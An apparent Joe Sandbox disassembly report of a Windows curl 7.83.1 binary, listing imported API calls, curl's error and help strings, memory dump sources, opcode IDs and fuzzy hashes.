                                    Similarity
                                    • API ID: _strdupfree
                                    • String ID:
                                    • API String ID: 1865132094-0
                                    APIs
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,I32,00000003,?,00E10FFB,?,00000000,766A43D0,?,00E11589,?,?,?,?,00000000), ref: 00E10EE5
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,I64,00000003,?,?,?,?,?,?,?,?,?,00000000), ref: 00E10EFA
                                    Strings
                                    Similarity
                                    • API ID: strncmp
                                    • String ID: I32$I64
                                    • API String ID: 1114863663-3980630743
                                    APIs
                                    • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00E124A8), ref: 00E34820
                                    • __alldvrm.LIBCMT ref: 00E34839
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E34863
                                    • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00E124A8,00000000), ref: 00E34873
                                    Similarity
                                    • API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1296068966-0
                                    APIs
                                    • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,?,?,00E010B6), ref: 00E1028E
                                    • __alldvrm.LIBCMT ref: 00E102A7
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E102D1
                                    • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,00E010B6), ref: 00E102DA
                                    Similarity
                                    • API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1296068966-0
                                    APIs
                                      • Part of subcall function 00E12677: realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E27EE5,?,?,?,00E28727,?,?,00000000,?,?,?,00E28849,00000000,?,?), ref: 00E126C4
                                      • Part of subcall function 00E12677: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E28849,00000000,?,?,?,00E12373,?,?,?,?,00E016C6,?,00200030), ref: 00E126DF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E28849,00000000,?,?,?,00E12373,?,?,?,?,00E016C6,?,00200030), ref: 00E27F33
                                    Strings
                                    Similarity
                                    • API ID: free$realloc
                                    • String ID: CURL_SSL_BACKEND$xk$xk
                                    APIs
                                    • DeleteCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00E08BF9,00E28B58,?,00E21E86,?,?,00000000), ref: 00E28889
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E21E86,?,?,00000000), ref: 00E2889F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E21E86,?,?,00000000), ref: 00E288B3
                                    • closesocket.WS2_32(000000FF), ref: 00E288CB
                                    Similarity
                                    • API ID: free$CriticalDeleteSectionclosesocket
                                    • String ID:
                                    APIs
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00E26067
                                      • Part of subcall function 00E2E9BE: inet_pton.WS2_32(00000002,?,?), ref: 00E2E9D8
                                      • Part of subcall function 00E2E9BE: inet_pton.WS2_32(00000017,?,?), ref: 00E2E9E9
                                    Strings
                                    Similarity
                                    • API ID: inet_pton$_time64
                                    • String ID: includesubdomains$max-age=
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E1F255
                                      • Part of subcall function 00E1941D: __alldvrm.LIBCMT ref: 00E19466
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E1F287
                                    Strings
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__alldvrm
                                    • String ID: Connection time-out
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000003,00000000,00000005), ref: 00E29B94
                                    Strings
                                    Similarity
                                    • API ID: _errno
                                    • String ID: %lx$0kv@qv@/lv
                                    Strings
                                    • SSL/TLS connection timeout, xrefs: 00E457CB
                                    • select/poll on SSL/TLS socket, errno: %d, xrefs: 00E457B9
                                    Similarity
                                    • API ID:
                                    • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E100A4
                                      • Part of subcall function 00E120F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,00E08A7A,curl 7.83.1 (Windows) %s,00000000), ref: 00E12101
                                    Strings
                                    • internal error: invalid pattern type (%d), xrefs: 00E10034
                                    • %0*lu, xrefs: 00E10014
                                    Similarity
                                    • API ID: __acrt_iob_func_strdup
                                    • String ID: %0*lu$internal error: invalid pattern type (%d)
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E3C351
                                    Strings
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr
                                    • String ID: Content-Length: %I64d$The file does not exist
                                    APIs
                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,00E3A3DE,?), ref: 00E3A6FF
                                    Strings
                                    • FTP response timeout, xrefs: 00E3A720
                                    • FTP response aborted due to select/poll error: %d, xrefs: 00E3A706
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID: FTP response aborted due to select/poll error: %d$FTP response timeout
                                    APIs
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?), ref: 00E104E3
                                    Strings
                                    Similarity
                                    • API ID: fputs
                                    • String ID: "%s":$"%s":null
                                    APIs
                                      • Part of subcall function 00E2E34A: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,766B1980,00000000,?,?,00E2E7A2,?), ref: 00E2E37D
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(?), ref: 00E2E523
                                    Strings
                                    Similarity
                                    • API ID: _time64tolower
                                    • String ID: Hostname in DNS cache was stale, zapped$|l
                                    APIs
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00E56C88,00000000,00000000,?,?,00000000,?,00E107A5,?,?), ref: 00E1096B
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00E607BC,00000000), ref: 00E109AF
                                    Strings
                                    Similarity
                                    • API ID: fputs
                                    • String ID: "curl_version":
                                    APIs
                                      • Part of subcall function 00E1D482: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1D52F
                                    • send.WS2_32(?,?,?,00000000), ref: 00E1D80F
                                    • WSAGetLastError.WS2_32 ref: 00E1D81F
                                    Strings
                                    Similarity
                                    • API ID: ErrorLastmallocsend
                                    • String ID: Send failure: %s
                                    APIs
                                    • htons.WS2_32(?), ref: 00E1E43C
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00E1EED8,?,?,?), ref: 00E1E45F
                                    Strings
                                    Similarity
                                    • API ID: _errnohtons
                                    • String ID: 0kv@qv@/lv
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E07E0E
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00E07E20
                                    Strings
                                    • -v, --verbose overrides an earlier trace/verbose option, xrefs: 00E07E3D
                                    Similarity
                                    • API ID: _strdupfree
                                    • String ID: -v, --verbose overrides an earlier trace/verbose option
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000000,?), ref: 00E29A46
                                    Strings
                                    Similarity
                                    • API ID: _errno
                                    • String ID: %d.%d.%d.%d$0kv@qv@/lv
                                    APIs
                                    • getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00E1EE2C
                                    • setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 00E1EE4B
                                      • Part of subcall function 00E10B38: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 00E10B6D
                                      • Part of subcall function 00E10B38: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00E10B74
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProcgetsockoptsetsockopt
                                    • String ID: @
                                    • API String ID: 1224256098-2726393805
                                    • Opcode ID: cb344702abfe8aef0dc2653f8f5a0743d85bda42377027793ddaab3e137e0d3d
                                    • Instruction ID: 08b3347d30cd4e5b10c7eed1bf9ee824928f8df0c1ba57a9a3a18232a1ca59da
                                    • Opcode Fuzzy Hash: cb344702abfe8aef0dc2653f8f5a0743d85bda42377027793ddaab3e137e0d3d
                                    • Instruction Fuzzy Hash: A30144B5904605BEEB20DB55EC89BEF77ADEB04759F100065FA01F62C0D7B09E888691
                                    APIs
                                    • gethostname.WS2_32(?,00000401), ref: 00E37300
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E37316
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrgethostname
                                    • String ID: localhost
                                    • API String ID: 2455561156-2663516195
                                    • Opcode ID: 481a1acacb8c53131ba8f7da4a24921c4589ef937252308d448811ed23b20514
                                    • Instruction ID: 7f7f122f5c49cc4280a2d8e6a4396d5a92851b1a6346d0febd5a59fc0dd3be69
                                    • Opcode Fuzzy Hash: 481a1acacb8c53131ba8f7da4a24921c4589ef937252308d448811ed23b20514
                                    • Instruction Fuzzy Hash: 770168F0A083089EE724D774AC55AEABBA8DF05314F4400ECDAC1BB181DE70AD4AC764
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E06CE3
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E06CF8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strdupfree
                                    • String ID: ;auto
                                    • API String ID: 1865132094-1462600812
                                    • Opcode ID: 4910b2c16715669e46d3371e08d5977c1533be0406e00fa262624e6e96a7c7c3
                                    • Instruction ID: e6e6704bd23eae29aaf8d2afaf312328ae59c5932d8cac973cd786f3b70e469a
                                    • Opcode Fuzzy Hash: 4910b2c16715669e46d3371e08d5977c1533be0406e00fa262624e6e96a7c7c3
                                    • Instruction Fuzzy Hash: 9001613510C7819FD3528B3488943A7BBE1AF9A319F182D5DE4D6A72C1DB25D485C712
                                    APIs
                                    • inet_pton.WS2_32(00000002,?,?), ref: 00E4025B
                                    • inet_pton.WS2_32(00000017,?,?), ref: 00E4027D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: inet_pton
                                    • String ID: Q
                                    • API String ID: 1350483568-4133517171
                                    • Opcode ID: 9934cea870f571d8e21aeea1e301555319699bee31cc412dee6ef8713d67cce4
                                    • Instruction ID: 1c52327380c77b4f58f1bb01e79675553bca47da1a336319d98c24eb02aaefd7
                                    • Opcode Fuzzy Hash: 9934cea870f571d8e21aeea1e301555319699bee31cc412dee6ef8713d67cce4
                                    • Instruction Fuzzy Hash: 00F0A972605308AED714DB65AD4AEFF77BCDF81710F204429F605F61D2D6B09A0897A4
                                    APIs
                                    • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 00E1ED8A
                                    • WSAGetLastError.WS2_32 ref: 00E1ED95
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A0C3
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0CB
                                      • Part of subcall function 00E1A0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0DD
                                      • Part of subcall function 00E1A0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 00E1A0EC
                                      • Part of subcall function 00E1A0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 00E1A0F6
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A142
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A15C
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A173
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A180
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A188
                                      • Part of subcall function 00E1A0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00E1A193
                                    Strings
                                    • Could not set TCP_NODELAY: %s, xrefs: 00E1EDAA
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_errno$_strrchr$__sys_errlist__sys_nerrsetsockoptstrncpy
                                    • String ID: Could not set TCP_NODELAY: %s
                                    • API String ID: 2763351927-4027281243
                                    • Opcode ID: 2f558a0a64f0414b184d1953d3ec0dbc4f54c69ad0a2fbb0d5da4a820217c80e
                                    • Instruction ID: 9603276f49064f807938b20489d8bf7f7d8aca66db9bfbb373dfc7ec5b38cd31
                                    • Opcode Fuzzy Hash: 2f558a0a64f0414b184d1953d3ec0dbc4f54c69ad0a2fbb0d5da4a820217c80e
                                    • Instruction Fuzzy Hash: 3DF096B1A403146EDB18AB21EC16AEFB7A9DF15311F400569F445B6181E9B4AA888E91
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E07782
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E0779E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strdupfree
                                    • String ID: a
                                    • API String ID: 1865132094-3904355907
                                    • Opcode ID: 5117987d572384fe14bda58e1e51bf80b8269cf675c42e5238c9b0131f5fc5f6
                                    • Instruction ID: 39afa57e32cc5b00bc7c62c4893c84c617cc2262506ba2457f3dfed503095416
                                    • Opcode Fuzzy Hash: 5117987d572384fe14bda58e1e51bf80b8269cf675c42e5238c9b0131f5fc5f6
                                    • Instruction Fuzzy Hash: ED01627450D7C19ED712CB3444442EBBBE16F9A318F1C5E4DE0E9A72C0D731D8868B52
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E075FB
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00004000), ref: 00E07617
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strdupfree
                                    • String ID: SRP
                                    • API String ID: 1865132094-1918707673
                                    • Opcode ID: 41f0acf34b270b19b4e74285354f7e95b066f660d7ebb1c018a0f055bb607aa3
                                    • Instruction ID: 311025405d2d55b98ca02ce219bdd67cdd2ade22956afadfc17a389245d9ac5f
                                    • Opcode Fuzzy Hash: 41f0acf34b270b19b4e74285354f7e95b066f660d7ebb1c018a0f055bb607aa3
                                    • Instruction Fuzzy Hash: 8FF096317087008FD710DF75A445BABB3E1AB80305F105D1EE59AF7180EB30A8458B50
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(f,00E2E345,?,f,?,?,00E1E066,00000100), ref: 00E29C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errno
                                    • String ID: 0kv@qv@/lv$f
                                    • API String ID: 2918714741-599043942
                                    • Opcode ID: 7d9d05f71f3ff4af85ce0a5bd0b3c6c37ad0dae0b5ab581a8dc7d2af587a3054
                                    • Instruction ID: b84cb8ba315056813c16adce349d530c702e9b351252c8bf761665278169d7c7
                                    • Opcode Fuzzy Hash: 7d9d05f71f3ff4af85ce0a5bd0b3c6c37ad0dae0b5ab581a8dc7d2af587a3054
                                    • Instruction Fuzzy Hash: 8FE086356083185BCF097F78F85946D7BD6EB88320F04E41AFC0DA776ADA31DE405985
                                    APIs
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(curl: ,?,?,00E0878D,?,%s,00000000), ref: 00E0916A
                                    Strings
                                    • curl: try 'curl --help' for more information, xrefs: 00E09188
                                    • curl: , xrefs: 00E09165
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: fputs
                                    • String ID: curl: $curl: try 'curl --help' for more information
                                    • API String ID: 1795875747-4128371185
                                    • Opcode ID: 4db5c8a96ca64f293001198b8b69a2084a56ace9acfbea8e2770a295905f9a38
                                    • Instruction ID: 70ab57b3a6e10a458e4d41cb1554d285534466f39e2943b574cb60b400d87951
                                    • Opcode Fuzzy Hash: 4db5c8a96ca64f293001198b8b69a2084a56ace9acfbea8e2770a295905f9a38
                                    • Instruction Fuzzy Hash: 37E04F3611430CBFDB089F40EC069E937A9EB40355F109455FD1C362A1DB72AAA4DB41
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E27312
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E273DB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E273EF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E27451
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 0266fdbcf2b3efdab64fd24ae5a373508b8d486af8e90bb8705cc7b827255485
                                    • Instruction ID: 9c72ea7244153f6cd637b847c56f3b6b0968cb9e78b340a6384128a67e0cd5bc
                                    • Opcode Fuzzy Hash: 0266fdbcf2b3efdab64fd24ae5a373508b8d486af8e90bb8705cc7b827255485
                                    • Instruction Fuzzy Hash: 5E616B71A0822ADFCF04DF58E884AADBBF1FF48314F289169D855B7261D770AD44DB90
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4F91E
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4F94E
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4F99B
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4F9AB
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: malloc
                                    • String ID:
                                    • API String ID: 2803490479-0
                                    • Opcode ID: b9e5f1e6aebe3a747c3d898350f87e183e31de5c6f5d05256ba3d89135d1c3af
                                    • Instruction ID: 93ec05a8d5062114fc7f12313fc10aba46c4a5831b600bcc8b2c9cbc616fc0b5
                                    • Opcode Fuzzy Hash: b9e5f1e6aebe3a747c3d898350f87e183e31de5c6f5d05256ba3d89135d1c3af
                                    • Instruction Fuzzy Hash: 59413531A04619EFCF089F69E89495DBFB4FF48350B1480AAE809EB361DB70AD54CF90
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E3711C), ref: 00E501E4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E3711C), ref: 00E50212
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E3711C), ref: 00E50233
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E5024A
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: cb5019c0475ee907c7425e3588e5f4cac565f53107b5bc5bde1b2fb16b33a7b3
                                    • Instruction ID: a49040bdb1e750ba87e5ff2f3b693cfbc39677c5fc878c23e2deeb53e6765cc4
                                    • Opcode Fuzzy Hash: cb5019c0475ee907c7425e3588e5f4cac565f53107b5bc5bde1b2fb16b33a7b3
                                    • Instruction Fuzzy Hash: 81215E76600A26DFCB086F56FD54419FBA1FF48362754953AE90AA3761CB786C28CF80
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E21DBD,?,?,?,00E08B8E), ref: 00E2151F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E08B8E), ref: 00E21549
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21577
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E215A5
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 62efc1fb23bb2c7a3cd5062289a7e465cb995f15bdf69e66c196684362382c82
                                    • Instruction ID: 5df0e15a3f9a8ff9237e8fe8b7ee6c83585dea8c023027f0f8ba975bfca1cac7
                                    • Opcode Fuzzy Hash: 62efc1fb23bb2c7a3cd5062289a7e465cb995f15bdf69e66c196684362382c82
                                    • Instruction Fuzzy Hash: 8F210832B40928EFDB099F24FC88799FB61FF85366F004196D405672A1CBB43E18CBA1
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4A4FB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4A52C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4A54E
